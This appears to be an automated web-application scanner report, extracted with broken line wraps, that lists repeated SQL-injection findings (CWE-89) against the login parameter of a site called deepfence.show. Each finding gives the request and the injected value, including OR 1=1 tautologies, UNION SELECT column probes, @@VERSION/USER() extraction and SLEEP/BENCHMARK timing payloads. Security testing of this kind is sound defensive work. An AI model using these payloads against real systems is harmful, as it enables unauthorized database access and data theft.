<!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #841Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' OR '1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #842\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" OR 1 = 1 -- -\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #843\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #844\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT USER()--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #845\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #846\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #847\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.io\"-\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #848\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #849\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin' --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #850\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #851\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #852\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('\nA')),4,5--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #853\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #854\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK\n(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" 